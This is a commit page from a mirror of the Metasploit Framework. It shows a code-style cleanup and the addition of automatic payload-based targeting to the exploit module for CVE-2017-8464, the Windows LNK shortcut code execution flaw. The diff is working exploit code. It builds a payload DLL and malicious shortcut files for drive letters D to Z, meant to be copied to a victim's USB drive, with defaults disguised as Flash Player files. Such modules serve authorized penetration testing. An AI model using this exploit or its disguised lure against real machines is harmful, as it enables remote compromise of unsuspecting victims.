infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

code style cleanup + add automatic targeting based on payload

bug/bundler_fix
Brent Cook 2017-08-03 00:27:54 -05:00
parent b62429f6fa
commit ddd841c0a8
1 changed files with 64 additions and 68 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

54
modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
View File

@ -12,7 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote
attr_accessor :exploit_dll_name attr_accessor :exploit_dll_name
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
update_info(
info,
'Name' => 'LNK Code Execution Vulnerability', 'Name' => 'LNK Code Execution Vulnerability',
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
@ -41,44 +43,46 @@ class MetasploitModule < Msf::Exploit::Remote
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => 'process', 'EXITFUNC' => 'process'
}, },
'Arch' => [ARCH_X86, ARCH_X64], 'Arch' => [ARCH_X86, ARCH_X64],
'Payload' => 'Payload' =>
{ {
'Space' => 2048, 'Space' => 2048
}, },
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { 'Arch' => ARCH_ANY } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
[ 'Windows x86', { 'Arch' => ARCH_X86 } ] [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
], ],
'DefaultTarget' => 0, # Default target is 64-bit 'DefaultTarget' => 0, # Default target is 64-bit
'DisclosureDate' => 'Jun 13 2017')) 'DisclosureDate' => 'Jun 13 2017'
)
)
register_options( register_options(
[ [
OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']), OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),
OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']), OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),
OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine']) OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
]) ]
)
register_advanced_options( register_advanced_options(
[ [
OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]) OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
]) ]
)
end end
def exploit def exploit
opts = {} path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
if target['Arch'] == ARCH_X64 arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464') datastore['EXE::Path'] = path
datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x64_windows.dll') datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
else
datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x86_windows.dll')
end
dll = generate_payload_dll dll = generate_payload_dll
dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll" dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll"
dll_path = store_file(dll, dll_name) dll_path = store_file(dll, dll_name)
@ -90,16 +94,13 @@ class MetasploitModule < Msf::Exploit::Remote
lnk_path = store_file(lnk, lnk_filename) lnk_path = store_file(lnk, lnk_filename)
print_status("#{lnk_path} created, copy to the target USB drive") print_status("#{lnk_path} created, copy to the target USB drive")
else else
# HACK the vulnerability doesn't appear to work with UNC paths # HACK: the vulnerability doesn't appear to work with UNC paths
# Create LNK files to different drives instead # Create LNK files to different drives instead
# Copying all the LNK files will likely trigger this vulnerability # Copying all the LNK files will likely trigger this vulnerability
('D'..'Z').each do |i| ('D'..'Z').each do |i|
lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk" fname, ext = (datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk").split('.')
if lnk_filename =~ /(.*)\.(.*)/ ext = 'lnk' if ext.nil?
lnk_filename = "#{$1}_#{i}.#{$2}" lnk_filename = "#{fname}_#{i}.#{ext}"
else
lnk_filename = "#{lnk_filename}_#{i}.lnk"
end
lnk = generate_link("#{i}:\\#{dll_name}") lnk = generate_link("#{i}:\\#{dll_name}")
lnk_path = store_file(lnk, lnk_filename) lnk_path = store_file(lnk, lnk_filename)
print_status("#{lnk_path} created, copy to the target USB drive") print_status("#{lnk_path} created, copy to the target USB drive")
@ -174,19 +175,14 @@ class MetasploitModule < Msf::Exploit::Remote
# Store the file in the MSF local directory (eg, /root/.msf4/local/) # Store the file in the MSF local directory (eg, /root/.msf4/local/)
def store_file(data, filename) def store_file(data, filename)
ltype = "exploit.fileformat.#{self.shortname}" @ltype = "exploit.fileformat.#{@shortname}"
if !::File.directory?(Msf::Config.local_directory) if !::File.directory?(Msf::Config.local_directory)
FileUtils.mkdir_p(Msf::Config.local_directory) FileUtils.mkdir_p(Msf::Config.local_directory)
end end
if filename and not filename.empty? if filename && !filename.empty?
if filename =~ /(.*)\.(.*)/ fname, ext = filename.split('.')
ext = $2
fname = $1
else
fname = filename
end
else else
fname = "local_#{Time.now.utc.to_i}" fname = "local_#{Time.now.utc.to_i}"
end end